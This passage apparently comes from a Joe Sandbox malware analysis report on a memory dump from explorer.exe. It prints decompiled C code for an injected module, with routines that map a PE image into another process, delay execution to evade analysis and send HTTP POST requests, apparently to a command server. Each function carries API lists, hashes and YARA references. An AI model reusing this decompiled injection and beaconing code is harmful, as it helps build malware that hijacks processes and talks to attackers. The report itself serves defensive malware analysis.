          • Part of subcall function 000CD523: CoCreateInstance.OLE32(000DB848,00000000,00000001,000DB858,?), ref: 000CD55E
          • Part of subcall function 000CD523: SysAllocString.OLEAUT32(00000000), ref: 000CD569
          • Part of subcall function 000CD523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 000CD594
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • SysAllocString.OLEAUT32(00000000), ref: 000CDBE5
        • SysAllocString.OLEAUT32(00000000), ref: 000CDBF9
        • SysFreeString.OLEAUT32(?), ref: 000CDF82
        • SysFreeString.OLEAUT32(?), ref: 000CDF8B
          • Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660
        Strings
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
        • String ID: FALSE$TRUE
        • API String ID: 1290676130-1412513891
        • Opcode ID: 8ff7c3086821ec5c3540cefe09e58b23ae2bf53af81bd7aab689222b4ac706ed
        • Instruction ID: 6d3b30d497bcb0c8dfd19b86225b387c7b8e5a58e6196622d1d0c5e8feda6800
        • Opcode Fuzzy Hash: 8ff7c3086821ec5c3540cefe09e58b23ae2bf53af81bd7aab689222b4ac706ed
        • Instruction Fuzzy Hash: DCE14F71D00219AFDB54EFA4C989FEEBBB9FF48300F10816EE505AB291DB75A905CB50
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CC6C0, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 200registryCOMMON
        Download Yara Rule
        C-Code - Quality: 59%
        			E000CC6C0(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				struct HINSTANCE__* _v40;
				char _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr _t75;
				intOrPtr _t80;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr _t96;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct HINSTANCE__* _t116;
				intOrPtr _t120;
				intOrPtr _t126;
				intOrPtr _t131;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t139;
				char _t140;
				intOrPtr _t141;

				_t69 =  *0xde688; // 0xf0000
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E000CE23E(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0xde780; // 0x0
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						_t136 =  *0xde780; // 0x0
						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						_t71 =  *0xde780; // 0x0
						 *((intOrPtr*)(_t71 + 0x20))(_v16);
					}
					return _v8;
				}
				_push(_t116);
				_push(0x8000000);
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				_push(0x40);
				_push( &_v44);
				_push(_t116);
				_push(0xe);
				_push( &_v16);
				_t80 =  *0xde780; // 0x0
				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
					if(_t106 != 0) {
						DestroyWindow(_t106);
						UnregisterClassA( &_v56, 0);
					}
				}
				_t139 =  *0xde780; // 0x0
				_push(0x40);
				_push(0);
				_push(2);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v12);
				_push(GetCurrentProcess());
				_push(_v16);
				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_push(0x40);
					_push(0);
					_push(2);
					_push( &_v24);
					_push(0);
					_push(0);
					_push(0);
					_t126 = _v20;
					_push( &_v8);
					_t92 =  *0xde780; // 0x0
					_push(_t126);
					_push(_v16);
					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
						goto L12;
					}
					_t140 = E000C8669( *0xde688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t95 =  *0xde684; // 0x280f8f0
					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
					_t120 =  *0xde684; // 0x280f8f0
					_t131 = _t96;
					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E000C861A( &_v32, 0x1ac4);
					_t141 =  *0xde688; // 0xf0000
					 *0xde688 = _t131;
					E000C86E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E000CC63F(_v12, _v8, _v36);
					 *0xde688 = _t141;
					goto L14;
				}
			}


































        0x000cc6c6
        0x000cc6cd
        0x000cc6cf
        0x000cc6d1
        0x000cc6d3
        0x000cc6d6
        0x000cc6d9
        0x000cc6dc
        0x000cc6df
        0x000cc6e2
        0x000cc6e5
        0x000cc6ef
        0x000cc6f2
        0x000cc6f9
        0x000cc6fe
        0x000cc6fe
        0x000cc704
        0x000cc706
        0x000cc70f
        0x000cc8b5
        0x000cc8b9
        0x000cc8be
        0x000cc8c4
        0x000cc8c7
        0x000cc8c7
        0x000cc8cb
        0x000cc8d0
        0x000cc8d5
        0x000cc8e2
        0x000cc8e2
        0x000cc8eb
        0x000cc8ed
        0x000cc8f5
        0x000cc8f5
        0x000cc8fc
        0x000cc8fc
        0x000cc718
        0x000cc719
        0x000cc71e
        0x000cc724
        0x000cc726
        0x000cc727
        0x000cc728
        0x000cc72d
        0x000cc72e
        0x000cc738
        0x00000000
        0x00000000
        0x000cc743
        0x000cc74d
        0x000cc757
        0x000cc75a
        0x000cc760
        0x000cc767
        0x000cc768
        0x000cc769
        0x000cc772
        0x000cc773
        0x000cc774
        0x000cc776
        0x000cc779
        0x000cc77c
        0x000cc77f
        0x000cc782
        0x000cc78e
        0x000cc7b0
        0x000cc7b8
        0x000cc7bb
        0x000cc7c6
        0x000cc7c6
        0x000cc7b8
        0x000cc7cc
        0x000cc7d5
        0x000cc7d7
        0x000cc7d8
        0x000cc7da
        0x000cc7db
        0x000cc7dc
        0x000cc7dd
        0x000cc7e1
        0x000cc7e8
        0x000cc7e9
        0x000cc7f1
        0x000cc8b2
        0x00000000
        0x000cc7f7
        0x000cc7f7
        0x000cc7f9
        0x000cc7fa
        0x000cc7ff
        0x000cc800
        0x000cc801
        0x000cc802
        0x000cc803
        0x000cc809
        0x000cc80a
        0x000cc80f
        0x000cc810
        0x000cc818
        0x00000000
        0x00000000
        0x000cc82e
        0x000cc830
        0x000cc837
        0x00000000
        0x00000000
        0x000cc848
        0x000cc84e
        0x000cc856
        0x000cc859
        0x000cc85f
        0x000cc86f
        0x000cc87b
        0x000cc880
        0x000cc886
        0x000cc896
        0x000cc8a2
        0x000cc8aa
        0x00000000
        0x000cc8aa

        APIs
        • RegisterClassExA.USER32 ref: 000CC785
        • CreateWindowExA.USER32 ref: 000CC7B0
        • DestroyWindow.USER32 ref: 000CC7BB
        • UnregisterClassA.USER32(?,00000000), ref: 000CC7C6
        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 000CC7E2
        • GetCurrentProcess.KERNEL32(00000000), ref: 000CC8DB
          • Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660
        Strings
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
        • String ID: 0$cdcdwqwqwq$sadccdcdsasa
        • API String ID: 3082384575-2319545179
        • Opcode ID: 695057daa4e252ea4eb13b3b64219fcdfa60d910730aafe074950a3034e28f83
        • Instruction ID: 90c4ed74458554630278fabfd861411d24eeea79e783751d3e5e158c8fbe04a2
        • Opcode Fuzzy Hash: 695057daa4e252ea4eb13b3b64219fcdfa60d910730aafe074950a3034e28f83
        • Instruction Fuzzy Hash: EF711971901249AFEB11DF95DC48FAFBBB9EF49700F14406AF905AB290D774AA04CB64
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C5F82, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 104COMMON
        Download Yara Rule
        C-Code - Quality: 78%
        			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				char _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t49;
				int _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq");
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E000C85EF();
				_t19 = E000C980C( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E000C8F78();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0xde69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E000C95C7(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E000C85C2( &_a8);
							_t53 = _t53 + 1;
						} while (_t53 < 0x2710);
						E000D2A5B( *0xde69c);
						 *_t55 = 0x7c3;
						 *0xde684 = E000CE1BC(0xdba28, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E000C95E1(0xdba28);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32);
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E000C85D5();
							_v8 = 0;
							_t37 =  *0xde684; // 0x280f8f0
							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E000C5E06, 0, 0,  &_v8);
							 *0xde6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E000C85D5();
					}
					goto L10;
				}
			}





















        0x000c5f82
        0x000c5f92
        0x000c5f9c
        0x000c60d0
        0x000c60c3
        0x00000000
        0x000c60c5
        0x000c60d7
        0x000c6098
        0x00000000
        0x000c6098
        0x000c5fa2
        0x000c5faa
        0x000c5fb1
        0x000c5fb3
        0x00000000
        0x000c5fc6
        0x000c5fc6
        0x000c5fcc
        0x000c5fd2
        0x000c5fe2
        0x000c5fe7
        0x000c5fef
        0x000c5ff7
        0x000c6013
        0x000c6018
        0x000c601b
        0x000c601d
        0x000c601f
        0x000c602c
        0x000c6035
        0x000c603e
        0x000c6043
        0x000c6044
        0x000c6052
        0x000c605c
        0x000c606d
        0x000c6072
        0x000c6079
        0x000c6080
        0x000c6083
        0x000c608f
        0x000c6090
        0x000c609c
        0x000c60a5
        0x000c60a9
        0x000c60b7
        0x000c60ba
        0x000c60c1
        0x00000000
        0x00000000
        0x00000000
        0x000c60c1
        0x000c6092
        0x000c6097
        0x00000000
        0x000c5ff7

        APIs
        • OutputDebugStringA.KERNEL32(Hello qqq), ref: 000C5F92
        • SetLastError.KERNEL32(000000AA), ref: 000C60D7
          • Part of subcall function 000C85EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,000C5FA7), ref: 000C85F8
          • Part of subcall function 000C980C: GetSystemTimeAsFileTime.KERNEL32(?,?,000C5FAF), ref: 000C9819
        • GetModuleHandleA.KERNEL32(00000000), ref: 000C5FCC
        • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 000C5FE7
        • GetLastError.KERNEL32 ref: 000C5FEF
        • memset.MSVCRT ref: 000C6013
        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 000C6035
        • GetFileAttributesW.KERNEL32(00000000), ref: 000C6083
        Strings
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemWidememset
        • String ID: Hello qqq
        • API String ID: 3872149766-3610097158
        • Opcode ID: d3311653e6ef723ce3dcc405afcd75808d60402d923c25814b3c7da900617843
        • Instruction ID: 2d4d97f5f62f02f8306ca91f288e7d0caa95757fa3380263e34e887ee25bd247
        • Opcode Fuzzy Hash: d3311653e6ef723ce3dcc405afcd75808d60402d923c25814b3c7da900617843
        • Instruction Fuzzy Hash: 6831A670900604ABEB64BB34DC49FAF3BB8EB55710F20852EF915D6192DF789A49CB31
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CE668, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305COMMON
        Download Yara Rule
        C-Code - Quality: 83%
        			E000CE668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E000C95C7(0x85b);
				_v60 = E000C95C7(0xdc9);
				_v56 = E000C95C7(0x65d);
				_v52 = E000C95C7(0xdd3);
				_t105 = E000C95C7(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E000CC379(_t214));
				_t113 =  *0xde6a4; // 0x0
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0xde6a4; // 0x0
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0xde788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0xde6a4; // 0x0
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0xde6a4; // 0x0
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0xde6a4; // 0x0
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0xde6a4; // 0x0
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0xde6a4; // 0x0
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E000C980C(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0xde6a4; // 0x0
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E000C980C(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E000C95C7(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0xde6a4; // 0x0
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E000CC379(_t217), _a4, _a8);
										E000C85C2( &_v12);
										if(_a24 != 0) {
											E000C980C(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0xde6a4; // 0x0
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E000C9749( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0xde6a4; // 0x0
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0xde6a4; // 0x0
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0xde6a4; // 0x0
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0xde6a4; // 0x0
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0xde6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0xde6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0xde6a4; // 0x0
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0xde6a4; // 0x0
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}



































































        0x000ce671
        0x000ce683
        0x000ce68c
        0x000ce696
        0x000ce69a
        0x000ce6ab
        0x000ce6c2
        0x000ce6cf
        0x000ce6dc
        0x000ce6e9
        0x000ce6ec
        0x000ce6f1
        0x000ce6f6
        0x000ce6f8
        0x000ce700
        0x000ce70b
        0x000ce712
        0x000ce71e
        0x000ce721
        0x000ce72f
        0x000ce732
        0x000ce738
        0x000ce739
        0x000ce73b
        0x000ce744
        0x000ce745
        0x000ce74a
        0x000ce750
        0x000ce75a
        0x000ce75c
        0x000ce761
        0x000ce761
        0x000ce770
        0x000ce77f
        0x000ce783
        0x000ce792
        0x000ce795
        0x000ce79a
        0x000ce79e
        0x000ce7a5
        0x000ce7ac
        0x000ce7b4
        0x000ce7bc
        0x000ce7c3
        0x000ce7cb
        0x000ce7d3
        0x000ce7da
        0x000ce7e2
        0x000ce7ea
        0x000ce7ff
        0x000ce80c
        0x000ce80e
        0x000ce813
        0x000ce813
        0x000ce81a
        0x000ce82b
        0x000ce830
        0x000ce832
        0x000ce832
        0x000ce846
        0x000ce858
        0x000ce85a
        0x000ce85d
        0x000ce862
        0x000ce862
        0x000ce869
        0x000ce878
        0x000ce87c
        0x000ce8ba
        0x000ce8bf
        0x000ce8c7
        0x000ce8cc
        0x000ce8d7
        0x000ce8dd
        0x000ce8e7
        0x000ce8ea
        0x000ce8f3
        0x000ce8f8
        0x000ce8f8
        0x000ce901
        0x000ce94a
        0x000ce94c
        0x000ce953
        0x000ce954
        0x000ce957
        0x000ce95d
        0x000ce961
        0x000ce962
        0x000ce967
        0x000ce969
        0x000ce96f
        0x000ce984
        0x000ce98c
        0x000ce9c1
        0x000ce9c6
        0x000ce9cb
        0x00000000
        0x000ce9cd
        0x000ce98e
        0x000ce990
        0x000ce990
        0x000ce999
        0x000ce99c
        0x000ce99e
        0x000ce9a0
        0x000ce9a6
        0x000ce9a6
        0x000ce9ab
        0x000ce9ad
        0x000ce9b4
        0x000ce9b4
        0x00000000
        0x000ce9b7
        0x000ce971
        0x000ce979
        0x00000000
        0x000ce903
        0x000ce903
        0x000ce909
        0x000ce90f
        0x000ce912
        0x00000000
        0x000ce912
        0x000ce901
        0x000ce87e
        0x000ce884
        0x000ce888
        0x000ce889
        0x000ce88e
        0x000ce890
        0x000ce896
        0x000ce8b4
        0x000ce8b4
        0x00000000
        0x000ce8b4
        0x000ce898
        0x000ce8a2
        0x000ce8a4
        0x000ce8a5
        0x000ce8aa
        0x000ce8ac
        0x000ce8b2
        0x00000000
        0x00000000
        0x00000000
        0x000ce86b
        0x000ce86b
        0x000ce914
        0x000ce914
        0x000ce91a
        0x000ce91d
        0x00000000
        0x000ce91d
        0x000ce81c
        0x000ce81c
        0x000ce91f
        0x000ce91f
        0x000ce925
        0x000ce928
        0x00000000
        0x000ce928
        0x000ce81a
        0x000ce785
        0x000ce92a
        0x000ce92d
        0x000ce92f
        0x000ce932
        0x000ce935
        0x000ce93e
        0x000ce943
        0x00000000
        0x00000000
        0x000ce947
        0x00000000
        0x000ce947
        0x000ce754
        0x00000000

        APIs
        Strings
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: memset$ErrorLast
        • String ID: POST
        • API String ID: 2570506013-1814004025
        • Opcode ID: dfd938f0bb15fde58defddc577967521ee4e7b500bdf816b0d1b8b88e8ab6379
        • Instruction ID: 4d43e44888571cf18f116a7444a457047133596d59fd9b6ecec0fcfd96a40a65
        • Opcode Fuzzy Hash: dfd938f0bb15fde58defddc577967521ee4e7b500bdf816b0d1b8b88e8ab6379
        • Instruction Fuzzy Hash: 5FB12C71901248AFEB55DFA4DC89FEE7BB8EF18310F10406AF505EB291DB749A44CB61
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000D16B8, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70libraryloaderCOMMON
        Download Yara Rule
        C-Code - Quality: 28%
        			E000D16B8(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}















        0x000d16c1
        0x000d16c8
        0x000d16d1
        0x000d16d5
        0x000d1750
        0x00000000
        0x000d1752
        0x000d16e3
        0x000d16e5
        0x000d16ea
        0x00000000
        0x00000000
        0x000d16f2
        0x000d16f4
        0x000d16f9
        0x00000000
        0x00000000
        0x000d1703
        0x000d1707
        0x00000000
        0x00000000
        0x000d1709
        0x000d170e
        0x000d1710
        0x000d1711
        0x000d1715
        0x000d171b
        0x00000000
        0x00000000
        0x000d1726
        0x000d172f
        0x000d1733
        0x00000000
        0x00000000
        0x000d1735
        0x000d1737
        0x000d173f
        0x000d1741
        0x000d1742
        0x000d174a
        0x00000000

        APIs
        • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,000C765A,?,?,00000000,?), ref: 000D16CB
        • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 000D16E3
        • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 000D16F2
        • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 000D1701
        Strings
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: AddressProc$HandleModule
        • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
        • API String ID: 667068680-129414566
        • Opcode ID: b65605c404d714bd0c7f6cdc014c82bbf85117c506fbb09874c6584b791f05d9
        • Instruction ID: d4b23a3b7ac53867078bef81616309f1c6fba6ca7a6e27690adaf6b111cb43cd
        • Opcode Fuzzy Hash: b65605c404d714bd0c7f6cdc014c82bbf85117c506fbb09874c6584b791f05d9
        • Instruction Fuzzy Hash: CF117332A05715BBEB615BEA8C84EEF7BF9AF45780B044066EA15F6350DE70D9008B74
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000D2122, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98stringCOMMON
        Download Yara Rule
        C-Code - Quality: 87%
        			E000D2122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L000D2285();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L000D22CD();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
